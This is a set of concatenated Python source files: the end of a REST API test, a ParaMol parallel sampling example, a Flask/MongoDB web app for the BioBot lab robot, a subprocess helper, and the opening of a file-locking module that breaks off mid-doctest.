data={"body": json.dumps(change_news)})
assert r.status_code == 200
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
assert r.status_code == 200
assert r.json() == change_news
# test delete
r = requests.delete("http://127.0.0.1:8888/api/news/",
cookies=user_cookie,
params={"title": "test_title"})
assert r.status_code == 200
r = requests.get("http://127.0.0.1:8888/api/news/",
params={"title": "test_title"})
assert r.status_code == 404
# test 404
r = requests.get("http://127.0.0.1:8888/api/news/")
assert r.status_code == 404
r = requests.post("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.delete("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.put("http://127.0.0.1:8888/api/news/",
cookies=user_cookie)
assert r.status_code == 404
# test column
# test put column
r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie,
data={"column": "test_column"})
assert r.status_code == 200
r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie,
data={"column": "test_column"})
assert r.status_code == 404
# test get column
r = requests.get("http://127.0.0.1:8888/api/column/")
assert r.status_code == 404
r = requests.get("http://127.0.0.1:8888/api/column/",
params={"column": "test_column"})
assert r.status_code == 200
assert r.json() == []
r = requests.get("http://127.0.0.1:8888/api/column/",
params={"column": "wrong_column"})
assert r.status_code == 404
# test get all column
r = requests.get("http://127.0.0.1:8888/api/getallcolumn/")
assert r.status_code == 200
finally:
stop()
|
example_8_parallel.py
|
import sys
sys.path.insert(0, "/home/treason/PycharmProjects/ParaMol_git_master")
import simtk.unit as unit
import multiprocessing as mp
# ParaMol imports
from ParaMol.System.system import *
# ParaMol Tasks imports
from ParaMol.HMC.hmc_sampler import *
from ParaMol.Utils.settings import *
# --------------------------------------------------------- #
# Preparation #
# --------------------------------------------------------- #
system_names = ["aniline_{}".format(i) for i in range(4)]
systems = []
# Create four identical aniline systems
for name in system_names:
# Create the OpenMM engine for aniline
openmm_system = OpenMMEngine(init_openmm=True, topology_format='AMBER', top_file='aniline.prmtop', crd_format="AMBER", crd_file='aniline.inpcrd')
# Create ParaMol System
systems.append(ParaMolSystem(name=name, engine=openmm_system, n_atoms=14))
# Create ParaMol settings instance
paramol_settings = Settings()
# --------------------------------------------------------- #
# Set the QM Engine #
# --------------------------------------------------------- #
# Create the ASE calculator
from ase.calculators.dftb import *
calc = Dftb(Hamiltonian_='DFTB', # line is included by default
Hamiltonian_MaxSCCIterations=1000,
Hamiltonian_MaxAngularMomentum_='',
Hamiltonian_MaxAngularMomentum_H='s',
Hamiltonian_MaxAngularMomentum_C='p',
Hamiltonian_MaxAngularMomentum_N="p",
Hamiltonian_Dispersion="DftD3 { \n s6=1.000 \n s8=0.5883 \n Damping = BeckeJohnson { \n a1=0.5719 \n a2=3.6017 \n } \n }",
Hamiltonian_SCC='Yes',
Hamiltonian_SCCTolerance=1e-8, )
# Alternatively, we can set the calculator directly in the settings
paramol_settings.qm_engine["ase"]["calculator"] = calc
# -------------------------------------------------------------- #
# Perform the HMC Parallel Sampling #
# -------------------------------------------------------------- #
HMC_samplers = [HMCSampler() for n in range(len(systems))]
output = mp.Queue()
processes_pool = []
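# One worker process per system; each runs HMCSampler.run_task with its own pickled copy of the keyword arguments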
for system, sampler in zip(systems, HMC_samplers):
hmc_kwargs = {"settings": paramol_settings,
"systems": [system],
"n_sweeps": 10000,
"n_steps_per_sweep": 100,
"temperature_pot_qm": unit.Quantity(300, unit.kelvin),
"temperature_pot_mm": unit.Quantity(300, unit.kelvin),
"temperature_kin_mm": unit.Quantity(300, unit.kelvin)}
processes_pool.append(mp.Process(target=sampler.run_task, kwargs=hmc_kwargs))
# Run processes
for sampler, system in zip(processes_pool, systems):
print("Starting HMC sampler of system {}".format(system.name))
sampler.start()
# Exit the completed processes
for sampler in processes_pool:
sampler.join()
# Write final data into file
for system in systems:
system.write_data()
|
biobot_web.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import argparse
import base64
from bson import ObjectId
import datetime
from flask import Flask, Markup, Response, abort, escape, flash, redirect, \
render_template, request, url_for
from flask_login import LoginManager, UserMixin, current_user, login_required, \
login_user, logout_user
from functools import wraps
from gridfs import GridFS
from jinja2 import evalcontextfilter
import json
import hashlib
import pandas as pd
import pymongo
import re
import subprocess
import threading
import time
import uuid
import webcolors
import biobot_schema
def hash_password(password):
"""This function hashes the password with SHA256 and a random salt"""
salt = uuid.uuid4().hex
return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
def check_password(hashed_password, user_password):
"""This function checks a password against a SHA256:salt entry"""
password, salt = hashed_password.split(':')
return password == hashlib.sha256(salt.encode() + user_password.encode()).hexdigest()
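# Example: check_password(hash_password('secret'), 'secret') returns True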
def admin_required(func):
"""Function wrapper to allow only logged in admins to access the page."""
@wraps(func)
def decorated_function(*args, **kwargs):
if not current_user.is_admin():
return redirect(url_for('bad_permissions'))
return func(*args, **kwargs)
return decorated_function
def valid_protocol(protocol):
"""Verify if the requested biological protocol exists."""
if protocol in client.database_names() and protocol.startswith('protocol'):
return True
else:
flash("Protocol {0} does not exist".format(protocol), 'warning')
return False
# Color functions used for BCA
def closest_color(requested_color):
"""Find the closest color name from an 8 bits RGB tuple."""
min_colors = {}
for key, name in webcolors.css21_hex_to_names.items():
r_c, g_c, b_c = webcolors.hex_to_rgb(key)
rd = (r_c - requested_color[0]) ** 2
gd = (g_c - requested_color[1]) ** 2
bd = (b_c - requested_color[2]) ** 2
min_colors[(rd + gd + bd)] = name
return min_colors[min(min_colors.keys())]
def get_color_name(requested_color):
"""Get the exact or closest color name of an 8 bit RGB tuple."""
try:
color_name = webcolors.rgb_to_name(requested_color)
except ValueError:
color_name = closest_color(requested_color)
return color_name
# Load default configuration from local file
with open('config.json') as config:
conf = argparse.Namespace(**json.load(config))
# Argument parser strings
app_description = "BioBot Website Application\n\n" \
"All information can be found at https://github.com/biobotus.\n" \
"Modify file 'config.json' to edit the application's configuration.\n" \
"There are other command line arguments that can be used:"
help_host = "Hostname of the Flask app. Default: {0}".format(conf.app_host)
help_port = "Port of the Flask app. Default: {0}".format(conf.app_port)
help_debug = "Start Flask app in debug mode. Default: {0}".format(conf.debug)
# Set up the command-line arguments
parser = argparse.ArgumentParser(description=app_description,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-H', '--app_host', help=help_host, default=conf.app_host)
parser.add_argument('-P', '--app_port', help=help_port, default=conf.app_port)
parser.add_argument('-D', '--debug', dest='debug', action='store_true', help=help_debug)
parser.set_defaults(debug=conf.debug)
# Update default configs with command line args
args = parser.parse_args()
conf.__dict__.update(args.__dict__)
# Get MongoDB Database Client
client = pymongo.MongoClient()
biobot = client['biobot']
fs = GridFS(biobot)
# Validate MongoDB is started, else exit
try:
client.server_info()
except pymongo.errors.ServerSelectionTimeoutError:
print('MongoDB is not started. Restart it before launching the web app again.')
quit()
# Create Flask Application
app = Flask(__name__)
app.secret_key = uuid.uuid4().hex # Required to use log in and session manager
login_manager = LoginManager()
login_manager.init_app(app)
# ROS variable
ros_pid = None
# User class
class User(UserMixin):
"""User Class making DB-stored parameters accessible from HTML templates."""
def __init__(self, username):
self.username = username
user = biobot.credentials.find_one({'username': username})
self.admin = user['admin']
def get_id(self):
return self.username
def is_admin(self):
return self.admin
# Login Manager Configuration
@login_manager.user_loader
def load_user(user_id):
return User(user_id)
@login_manager.unauthorized_handler
def unauthorized_callback():
return redirect('/login?next=' + request.path)
# Application routes
@app.route('/')
def go_home():
return redirect(url_for('home'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
next_page = request.args.get('next')
username = request.form['username']
password = request.form['password']
user = biobot.credentials.find_one({'username': username})
if user and check_password(user['password'], password):
if user['active']: # Inactive users should not be able to log in
login_user(User(username))
biobot.credentials.update_one(user, {'$set':
{'last_login' : time.time()}})
# If an admin logs in and there is at least one inactive user, show it
if user['admin'] and biobot.credentials.find_one({'active': False}):
flash('At least one user account has to be activated', 'info')
return redirect(url_for('manage_users'))
return redirect(next_page or url_for('home'))
else:
flash('Account not yet activated by an administrator', 'warning')
else:
flash('Invalid credentials', 'danger')
return render_template('login.html')
else:
return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/create_account', methods=['GET', 'POST'])
def create_account():
if request.method == 'POST':
next = request.args.get('next')
username = request.form['username'].strip()
password = request.form['password']
password_confirm = request.form['password_confirm']
if not password:
flash('Password cannot be empty', 'danger')
return render_template('create_account.html')
if password != password_confirm:
flash('Both password entries do not match', 'danger')
return render_template('create_account.html')
if not username.replace('_', '').isalnum():
# Only allow letters, numbers and underscore characters in usernames
flash('Invalid username (letters, numbers and underscores only)', 'danger')
return render_template('create_account.html')
user = biobot.credentials.find_one({'username': username})
if user or not username: # Check if username is not empty or already taken
flash('Username not available', 'danger')
return render_template('create_account.html')
active = False
admin = False
# If this is the first user to register, make it active and admin
if not biobot.credentials.find_one():
active = True
admin = True
flash('First account created, activated and is administrator, congratulations!', 'success')
# Create a new user account
biobot.credentials.insert_one({'username': username,
'password': hash_password(password),
'active': active,
'admin': admin})
flash('Account created successfully', 'success')
return redirect(url_for('login'))
else:
return render_template('create_account.html')
@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
if request.method == 'POST':
username = request.form['username']
old_password = request.form['old_password']
new_password = request.form['new_password']
user = biobot.credentials.find_one({'username': username})
if user and check_password(user['password'], old_password):
if not new_password:
flash('Password cannot be empty', 'danger')
return render_template('change_password.html')
# Modify password
biobot.credentials.update_one(user, {'$set': {
'password': hash_password(new_password)}})
flash('Password changed successfully', 'success')
return redirect(url_for('login'))
else:
flash('Invalid credentials', 'danger')
return render_template('change_password.html')
else:
return render_template('change_password.html')
def ros_thread():
"""Run shell command defined as 'roslaunch' in config file to start ROS."""
global ros_pid
try:
popen = subprocess.Popen(conf.roslaunch.split())
ros_pid = popen.pid
return_code = popen.wait()
if return_code:
print("subprocess.CalledProcessError: Command '{0}' returned non-zero exit status {1}".format(conf.roslaunch, return_code))
finally:
ros_pid = None
@app.route('/ros_status')
@login_required
@admin_required
def ros_status():
return render_template('ros_status.html', pid=ros_pid)
@app.route('/ros_start')
@login_required
@admin_required
def ros_start():
if not ros_pid:
threading.Thread(target=ros_thread).start()
return redirect(url_for('ros_status'))
@app.route('/ros_stop')
@login_required
@admin_required
def ros_stop():
if ros_pid:
subprocess.call("kill -15 {}".format(ros_pid), shell=True)
return redirect(url_for('ros_status'))
@app.route('/home')
def home():
return render_template('index.html')
@app.route('/surveillance')
def surveillance():
return render_template('surveillance.html')
@app.route('/control')
@login_required
def control():
return render_template('control.html')
@app.route('/protocol_editor')
@login_required
def protocol_editor():
labware = json.loads(get_schema('labware'))
return render_template('protocol_editor.html', labware=labware)
@app.route('/deck_editor')
@login_required
def deck_editor():
return render_template('deck_editor.html')
@app.route('/deck_editor/send/<b64_deck>')
@login_required
def receive_deck(b64_deck):
deck = json.loads(base64.b64decode(b64_deck).decode('utf-8'))
if deck: # Prevent empty list that would make insert_many crash
for i in range(len(deck)):
# Add extra tags used by application
deck[i]['source'] = 'deck_editor'
deck[i]['uuid'] = uuid.uuid4().hex
deck[i]['validated'] = False
biobot.deck.insert_many(deck)
return redirect(url_for('mapping'))
@app.route('/mapping')
@login_required
def mapping():
from_editor = list(biobot.deck.find({'source': 'deck_editor', 'validated': False}))
from_carto = list(biobot.deck.find({'source': '3d_cartography', 'validated': False}))
validated = list(biobot.deck.find({'validated': True}))
if from_editor or from_carto:
flash('Some labware locations have to be validated.', 'warning')
elif len(validated) == 0:
flash('No labware has been found.', 'danger')
else:
flash('All labware has been validated.', 'success')
return render_template('mapping.html', from_editor=from_editor,
from_carto=from_carto, validated=validated)
@app.route('/mapping/delete/<uid>')
@login_required
def mapping_delete(uid):
item = biobot.deck.find_one({'uuid': uid})
if item:
if item['source'] == '3d_cartography':
# Picture of items coming from 3D cartography has to be deleted
fs.delete(item['image_id'])
biobot.deck.delete_one(item)
return redirect(url_for('mapping'))
@app.route('/mapping/modify/<uid>')
@login_required
def mapping_modify(uid):
biobot.deck.update_one({'uuid': uid}, {'$set': {'validated': False}})
return redirect(url_for('mapping'))
@app.route('/mapping/validate/<uid>', methods=['GET', 'POST'])
@login_required
def mapping_validate(uid):
if request.method == 'GET':
item = biobot.deck.find_one({'uuid': uid})
# Get a list of non-tool labware options for the item type dropdown menu
deck_cursor = biobot.labware.find({'class': {'$ne': 'Tool'}})
deck = sorted([item['type'] for item in deck_cursor])
options = "<option value={0}>{1}</option>"
all_options = [options.format(i, i.replace('_', ' ').title()) for i in deck]
labware_options = Markup(''.join(all_options))
# Get items' approximate coordinates
if item['source'] == 'deck_editor':
ini = {'x': round(conf.deck_length/100*int(item['col'])+conf.deck_length/200, 3),
'y': round(conf.deck_width/26*(ord(item['row'])-65)+conf.deck_width/52, 3)}
else:
ini = {'x': round(item['carto_x'], 3),
'y': round(item['carto_y'], 3)}
return render_template('validate.html', item=item, ini=ini, \
labware_options=labware_options)
else:
if request.form['valid_x'] != '' and request.form['valid_y'] != '' and \
request.form['valid_z'] != '':
try:
biobot.deck.update_one({'uuid': uid},
{'$set': {'type': request.form['type'],
'name': request.form['name'],
'valid_x': float(request.form['valid_x']),
'valid_y': float(request.form['valid_y']),
'valid_z': float(request.form['valid_z']),
'validated': True}})
return redirect(url_for('mapping'))
except ValueError:
# Could happen if manually entered value is not a float
# The manual coordinate entry is only available to admins
flash('Coordinates must be floating point numbers only.', 'danger')
else:
flash('Cannot validate item with empty coordinates', 'danger')
return redirect(request.url)
@app.route('/logs')
def logs():
stats = list(biobot.stats.find())
return render_template('logs.html', stats=stats)
@app.route('/logs/<protocol>')
def log_highlights(protocol):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
# Get database of current protocol
db = client[protocol]
started = db.steps.count()
done = db.steps.count({'end': {'$exists': True}})
info = db.protocol.find_one()
json_protocol = {}
if info:
# Pretty print the raw protocol
json_protocol = json.dumps(info['protocol'], indent=4, sort_keys=True)
return render_template('log_highlights.html', active='Highlights', \
protocol=protocol, json_protocol=json_protocol, \
started=started, done=done, db=db)
@app.route('/logs/<protocol>/steps')
def log_steps(protocol):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
steps = list(db.steps.find())
return render_template('log_steps.html', active='Steps', protocol=protocol, \
steps=steps, db=db)
@app.route('/logs/<protocol>/bca')
@app.route('/logs/<protocol>/bca/step/<int:step>')
def log_bca(protocol, step=None):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
colonies = list(db.colonies.find({'operation': 'analysis'}))
if not colonies:
flash("No bacterial colonies was found for protocol {0}".format(protocol), 'warning')
return redirect("/logs/{0}".format(protocol))
df = pd.DataFrame(colonies)
steps = sorted(df.step.unique())
if step is None:
# If no step is entered, return first
# step for which there was an analysis in the protocol
return redirect("{0}/step/{1}".format(request.url, steps[0]))
current_colonies = list(db.colonies.find({'step': step, 'operation': 'analysis'}))
# Add closest color names and retrieve list of unique colors
df = pd.DataFrame(current_colonies)
df['color_text'] = df.color.apply(webcolors.hex_to_rgb).apply(get_color_name)
colors = list(df.color_text.unique())
# Convert the DataFrame back to a list of dictionaries
current_colonies = [x.to_dict() for _, x in df.iterrows()]
# Information about pictures to display in the page
pictures = [{
'title': 'Raw',
'description': 'Raw picture of the Petri dish',
'filename': "raw_{}.jpg".format(step)
},{
'title': 'Analysis',
'description': 'Highlighted colonies have been characterized',
'filename': "analysis_{}.jpg".format(step)
}]
return render_template('log_bca.html', active='BCA', protocol=protocol, \
steps=steps, current=step, colonies=current_colonies, \
colors=colors, db=db, pictures=pictures)
@app.route('/logs/<protocol>/picking/<pick_num>')
@app.route('/logs/<protocol>/picking/<pick_num>/step/<int:step>')
def log_picking(protocol, pick_num, step=None):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
colonies = list(db.colonies.find({'operation': pick_num}))
if not colonies:
flash("No bacterial colonies was found for protocol {0}".format(protocol), 'warning')
return redirect("/logs/{0}".format(protocol))
steps = sorted(pd.DataFrame(colonies).step.unique())
if step is None:
# If no step is entered, return first
# step for which there was an analysis in the protocol
return redirect("{0}/step/{1}".format(request.url, steps[0]))
current_colonies = list(db.colonies.find({'step': step, 'operation': pick_num}))
# Add closest color names and retrieve list of unique colors
df = pd.DataFrame(current_colonies)
df['color_text'] = df.color.apply(webcolors.hex_to_rgb).apply(get_color_name)
colors = list(df.color_text.unique())
# Convert the DataFrame back to a list of dictionaries
current_colonies = [x.to_dict() for _, x in df.iterrows()]
# Get the picking criteria
characteristics = db.picking.find_one({'step': step, 'pick_num': pick_num})
# Information about pictures to display in the page
pictures = [{
'title': 'Raw',
'description': 'Raw picture of the Petri dish',
'filename': "raw_{}.jpg".format(step)
},{
'title': 'Colony Picking',
'description': 'Highlighted colonies have been selected for picking',
'filename': "{}_{}.jpg".format(pick_num, step)
}]
return render_template('log_picking.html', active='BCA', protocol=protocol, \
steps=steps, current=step, colonies=current_colonies, \
colors=colors, db=db, pictures=pictures,
characteristics=characteristics, pick_num=pick_num)
@app.route('/logs/delete/<protocol>')
@login_required
@admin_required
def delete_logs(protocol):
if not valid_protocol(protocol):
flash("Cannot delete unexisting protocol {0}".format(protocol), 'danger')
return redirect(url_for('logs'))
# Delete all data from current protocol
biobot.stats.delete_one({'id': protocol})
images = list(biobot.bca_images.find({'protocol': protocol}))  # match on the protocol variable, not the literal string
for img in images:
fs.delete(img['image_id'])
biobot.bca_images.delete_many({'protocol': protocol})
client.drop_database(protocol)
flash("Entry {0} deleted successfully".format(protocol), 'info')
return redirect(url_for('logs'))
@app.route('/manage_users')
@login_required
@admin_required
def manage_users():
user_list = list(biobot.credentials.find())
return render_template('manage_users.html', users=user_list)
@app.route('/manage_users/activate/<username>')
@login_required
@admin_required
def activate_user(username):
"""Activate a user account."""
user = biobot.credentials.find_one({'username': username})
if not user['active']:
biobot.credentials.update_one(user, {'$set': {'active': True}})
flash("User {0} activated successfully".format(username), 'success')
else:
flash("User {0} is already active".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/demote/<username>')
@login_required
@admin_required
def demote_user(username):
"""Remove admin privileges of another administrator."""
user = biobot.credentials.find_one({'username': username})
if current_user.get_id() == username:
flash('Cannot revert yourself to standard user', 'danger')
elif user:
if user['admin']:
biobot.credentials.update_one(user, {'$set': {'admin': False}})
flash("User {0} reverted to standard user successfully".format(username), 'info')
else:
flash("User {0} is already a standard user".format(username), 'warning')
else:
flash("Cannot revert unknown user {0} to standard user".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/promote/<username>')
@login_required
@admin_required
def promote_user(username):
"""Give admin privileges from a normal user."""
user = biobot.credentials.find_one({'username': username})
if user:
if user['admin']:
flash("User {0} is already an administrator".format(username), 'warning')
else:
biobot.credentials.update_one(user, {'$set': {'admin': True}})
flash("User {0} promoted to administrator successfully".format(username), 'info')
else:
flash("Cannot promote unknown user {0} to administrator".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/delete/<username>')
@login_required
@admin_required
def delete_user(username):
"""Delete a user account that is not yours."""
user = biobot.credentials.find_one({'username': username})
if current_user.get_id() == username:
flash('Cannot delete yourself', 'danger')
elif user:
biobot.credentials.delete_one(user)
flash("User {0} deleted successfully".format(username), 'info')
else:
flash("Cannot delete unknown user {0}".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_labware', methods=['GET', 'POST'])
@login_required
@admin_required
def manage_labware():
if request.method == 'POST':
# Add a new labware entry
item_type = request.form['type'].lower().strip().replace(' ', '_')
description = request.form['description']
item_class = request.form['class']
item = biobot.labware.find_one({'type': item_type})
if not item_type:
flash('Empty labware item type is invalid', 'danger')
elif item:
flash("Labware item {0} already exists".format(item_type), 'warning')
else:
biobot.labware.insert_one({'type': item_type, 'description': description, 'class': item_class})
flash("Labware item {0} added successfully".format(item_type), 'success')
labware_list = list(biobot.labware.find())
return render_template('manage_labware.html', labware=labware_list)
@app.route('/manage_labware/delete/<item_type>')
@login_required
@admin_required
def delete_labware(item_type):
item = biobot.labware.find_one({'type': item_type})
if item:
biobot.labware.delete_one(item)
flash("Item {0} deleted successfully".format(item_type), 'info')
else:
flash("Cannot delete unknown item {0}".format(item_type), 'danger')
return redirect(url_for('manage_labware'))
@app.route('/manage_labware/edit_tools')
@login_required
@admin_required
def edit_tools():
# Get tools physical configuration from its config file
try:
with open('tools_conf.json', 'r') as f:
tools = json.load(f)
except EnvironmentError:
tools = []
return render_template('edit_tools.html', tools=Markup(tools))
@app.route('/manage_labware/edit_tools/save/<b64_tools>')
@login_required
@admin_required
def save_tools(b64_tools):
# Overwrite the tools config file with the new tools data
tools = json.loads(base64.b64decode(b64_tools).decode('utf-8'))
with open('tools_conf.json', 'w') as f:
json.dump(tools, f)
return redirect(url_for('edit_tools'))
@app.route('/bad_permissions')
def bad_permissions():
"""Function called if a normal user tries to get to an admin reserved page."""
return render_template('bad_permissions.html')
@app.route('/get/schema/<value>')
def get_schema(value):
"""
Returns the JSON Schema asked by JavaScript Ajax Request.
If schema does not exist, it returns an empty JSON object.
"""
schema = biobot_schema.get_schema(value, conf, biobot)
return json.dumps(schema)
@app.errorhandler(404)
def page_not_found(error):
"""This method handles all unexisting route requests."""
return render_template('404.html'), 404
# Add objects that can be called from the Jinja2 HTML templates
@app.template_filter()
@evalcontextfilter
def nl2br(eval_ctx, value):
"""Converts new lines to paragraph breaks in HTML."""
_paragraph_re = re.compile(r'(?:\r\n|\r|\n){2,}')
result = '\n\n'.join('<p>%s</p>' % p.replace('\n', '<br>\n') \
for p in _paragraph_re.split(escape(value)))
result = result.replace(' ', ' ')
if eval_ctx.autoescape:
result = Markup(result)
return result
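# Example of the filter's output for a hypothetical input, when applied in a
# Jinja2 template as {{ text | nl2br }}:
#   "first paragraph\n\nsecond\nline"
#   -> "<p>first paragraph</p>\n\n<p>second<br>\nline</p>"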
def convert_ts(ts):
"""Convert timestamp to human-readable string"""
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
def format_sidebar(name, icon, url):
"""
Used to generate HTML line for sidebar in layout.html.
- name is the name of the tab
    - icon is the glyphicon name
    - url is the relative URL the tab links to
    """
current_url = request.path.split('/')[1]
active = ' class="active"' if url == current_url else ''
html = '<li{0}><a href="/{1}"><i style="float:left; margin-right: 14px;">' \
'<span class="glyphicon glyphicon-{2}"></span></i>{3}' \
'</a></li>'.format(active, url, icon, name)
return Markup(html)
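# For instance (sketch), format_sidebar('Users', 'user', 'manage_users'),
# rendered while on the /manage_users page, yields roughly:
#   <li class="active"><a href="/manage_users"><i style="float:left; margin-right: 14px;">
#   <span class="glyphicon glyphicon-user"></span></i>Users</a></li>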
def get_item_picture(filename, tags=""):
"""Return the picture of the requested deck item. (filenames are uid.jpg)"""
image = biobot.deck.find_one({'filename': filename})
if image:
image_id = image['image_id']
img = fs.get(image_id).read()
b64data = base64.b64encode(img).decode('utf-8')
html = '<img src="data:image/jpeg;base64,{0}" {1}>'.format(b64data, tags)
else:
html = '<img alt="Image {0} not found" {1}>'.format(filename, tags)
return Markup(html)
def get_bca_picture(filename, protocol, step, tags=""):
"""Return the picture of the requested BCA picture, with click download and optional tags."""
image = biobot.bca_images.find_one({'protocol': protocol, 'step': step, 'filename': filename})
if image:
image_id = image['image_id']
try:
img = fs.get(image_id).read()
b64data = base64.b64encode(img).decode('utf-8')
img_html = '<img src="data:image/jpeg;base64,{0}" {1}>'.format(b64data, tags)
html = '<a href="data:image/jpeg;base64,{0}" download="{1}">{2}</a>'.format(b64data, filename, img_html)
return Markup(html)
        except Exception:
            # Fall through to the "not found" placeholder below.
            pass
html = '<img alt="Image {0} not found" {1}>'.format(filename, tags)
return Markup(html)
# Make some variables and functions available from Jinja2 HTML templates
app.jinja_env.globals.update(conf=conf,
force_type = Markup('onselect="return false" ' \
'onpaste="return false" ' \
'oncopy="return false" ' \
'oncut="return false" ' \
'ondrag="return false" ' \
'ondrop="return false" ' \
'autocomplete=off'),
format_sidebar=format_sidebar,
convert_ts=convert_ts,
get_item_picture=get_item_picture,
get_bca_picture=get_bca_picture)
# Start the application
if __name__ == '__main__':
app.run(debug=conf.debug, host=conf.app_host, port=int(conf.app_port))
|
process.py
|
# ============================================================================
# FILE: process.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
import subprocess
from threading import Thread
from queue import Queue
from time import time
import os
class Process(object):
def __init__(self, commands, context, cwd):
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self.__proc = subprocess.Popen(commands,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
cwd=cwd)
self.__eof = False
self.__context = context
self.__queue_out = Queue()
self.__thread = Thread(target=self.enqueue_output)
self.__thread.start()
def eof(self):
return self.__eof
def kill(self):
if not self.__proc:
return
self.__proc.kill()
self.__proc.wait()
self.__proc = None
self.__queue_out = None
self.__thread.join(1.0)
self.__thread = None
def enqueue_output(self):
for line in self.__proc.stdout:
if not self.__queue_out:
return
self.__queue_out.put(
line.decode(self.__context['encoding'],
errors='replace').strip('\r\n'))
def communicate(self, timeout):
if not self.__proc:
return ([], [])
start = time()
outs = []
while not self.__queue_out.empty() and time() < start + timeout:
outs.append(self.__queue_out.get_nowait())
if self.__thread.is_alive() or not self.__queue_out.empty():
return (outs, [])
_, errs = self.__proc.communicate(timeout=timeout)
errs = errs.decode(self.__context['encoding'],
errors='replace').splitlines()
self.__eof = True
self.__proc = None
self.__thread = None
        self.__queue_out = None
return (outs, errs)
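
if __name__ == '__main__':
    # Minimal usage sketch, assuming a POSIX 'echo' binary and a UTF-8
    # encoding in the context; it streams the output of a short-lived command.
    proc = Process(['echo', 'hello'], {'encoding': 'utf-8'}, cwd='.')
    while not proc.eof():
        outs, errs = proc.communicate(timeout=0.5)
        for out in outs:
            print(out)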
|
lockfile.py
|
"""
lockfile.py - Platform-independent advisory file locks.
Requires Python 2.5 unless you apply 2.4.diff
Locking is done on a per-thread basis instead of a per-process basis.
Usage:
>>> lock = FileLock(_testfile())
>>> try:
... lock.acquire()
... except AlreadyLocked:
... print _testfile(), 'is locked already.'
... except LockFailed:
... print _testfile(), 'can\\'t be locked.'
... else:
... print 'got lock'
got lock
>>> print lock.is_locked()
True
>>> lock.release()
>>> lock = FileLock(_testfile())
>>> print lock.is_locked()
False
>>> with lock:
... print lock.is_locked()
True
>>> print lock.is_locked()
False
>>> # It is okay to lock twice from the same thread...
>>> with lock:
... lock.acquire()
...
>>> # Though no counter is kept, so you can't unlock multiple times...
>>> print lock.is_locked()
False
Exceptions:
Error - base class for other exceptions
LockError - base class for all locking exceptions
AlreadyLocked - Another thread or process already holds the lock
LockFailed - Lock failed for some other reason
UnlockError - base class for all unlocking exceptions
AlreadyUnlocked - File was not locked.
NotMyLock - File was locked but not by the current thread/process
To do:
* Write more test cases
- verify that all lines of code are executed
* Describe on-disk file structures in the documentation.
"""
from __future__ import division, with_statement
import socket
import os
import threading
import time
import errno
import thread
class Error(Exception):
"""
Base class for other exceptions.
>>> try:
... raise Error
... except Exception:
... pass
"""
pass
class LockError(Error):
"""
Base class for error arising from attempts to acquire the lock.
>>> try:
... raise LockError
... except Error:
... pass
"""
pass
class LockTimeout(LockError):
"""Raised when lock creation fails within a user-defined period of time.
>>> try:
... raise LockTimeout
... except LockError:
... pass
"""
pass
class AlreadyLocked(LockError):
"""Some other thread/process is locking the file.
>>> try:
... raise AlreadyLocked
... except LockError:
... pass
"""
pass
class LockFailed(LockError):
"""Lock file creation failed for some other reason.
>>> try:
... raise LockFailed
... except LockError:
... pass
"""
pass
class UnlockError(Error):
"""
Base class for errors arising from attempts to release the lock.
>>> try:
... raise UnlockError
... except Error:
... pass
"""
pass
class NotLocked(UnlockError):
"""Raised when an attempt is made to unlock an unlocked file.
>>> try:
... raise NotLocked
... except UnlockError:
... pass
"""
pass
class NotMyLock(UnlockError):
"""Raised when an attempt is made to unlock a file someone else locked.
>>> try:
... raise NotMyLock
... except UnlockError:
... pass
"""
pass
class LockBase:
"""Base class for platform-specific lock classes."""
def __init__(self, path, threaded=True):
"""
>>> lock = LockBase(_testfile())
"""
self.path = path
self.lock_file = os.path.abspath(path) + ".lock"
self.hostname = socket.gethostname()
self.pid = os.getpid()
if threaded:
tname = "%x-" % thread.get_ident()
else:
tname = ""
dirname = os.path.dirname(self.lock_file)
self.unique_name = os.path.join(dirname,
"%s.%s%s" % (self.hostname,
tname,
self.pid))
def acquire(self, timeout=None):
"""
Acquire the lock.
* If timeout is omitted (or None), wait forever trying to lock the
file.
* If timeout > 0, try to acquire the lock for that many seconds. If
the lock period expires and the file is still locked, raise
LockTimeout.
* If timeout <= 0, raise AlreadyLocked immediately if the file is
already locked.
>>> # As simple as it gets.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.release()
>>> # No timeout test
>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait() # wait for thread t to acquire lock
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.acquire(timeout=-1)
... except AlreadyLocked:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'thread', threading.currentThread().getName(),
... print 'erroneously locked an already locked file.'
... lock2.release()
...
>>> e2.set() # tell thread t to release lock
>>> t.join()
>>> # Timeout test
